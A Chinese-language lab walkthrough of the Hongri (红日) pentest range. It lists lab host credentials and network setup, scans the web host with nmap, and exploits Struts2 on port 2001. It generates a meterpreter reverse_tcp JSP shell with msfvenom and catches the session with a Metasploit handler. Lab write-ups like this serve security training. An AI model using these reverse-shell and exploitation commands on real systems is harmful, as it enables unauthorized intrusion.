赞
踩
靶场下载地址:漏洞详情
共有三台主机DC、WEB、WIN7
机器密码
WEB主机 ubuntu:ubuntu
WIN7主机 douser:Dotest123
(DC)WIN2008主机 administrator:Test2008
网络配置
创建两个子网vmnet0和vmnet1
vmnet1:192.168.183.0
WEB主机网卡设置
WIN7主机网卡设置
DC主机网卡设置
攻击机kali的网卡和WEB主机的第一个出网网卡一致为NAT模式
WEB主机(Ubuntu)
DC主机(Windows 2008)
WIN7
WEB主机(Ubuntu)上启动环境
sudo docker start ec 17 09 bb da 3d ab ad
扫描端口开放情况
nmap -sS -p 1-65535 -A 192.168.48.146
端口22开放,存在SSH服务
2001,2002,2003端口开放,存在WEB
看到2001使用了Struts2中间件
2002使用了Apache Tomcat中间件
2003为Apache、PHPmyadmin、mysql
访问WEB
2001端口
2002端口
2003端口,发现不需要密码就可以进入phpmyadmin后台
使用了Struts2
直接使用工具进行检测和利用
利用漏洞上传msf马
生成msf马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4444 -f jsp > shell.jsp
msf启动监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.48.136
exploit
访问马
成功收到会话
还可以利用phpmyadmin来使用数据库日志写入马来获得会话,这里就不做演示了,方法和之前的红日靶场一的一样,可以前往查看。链接:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。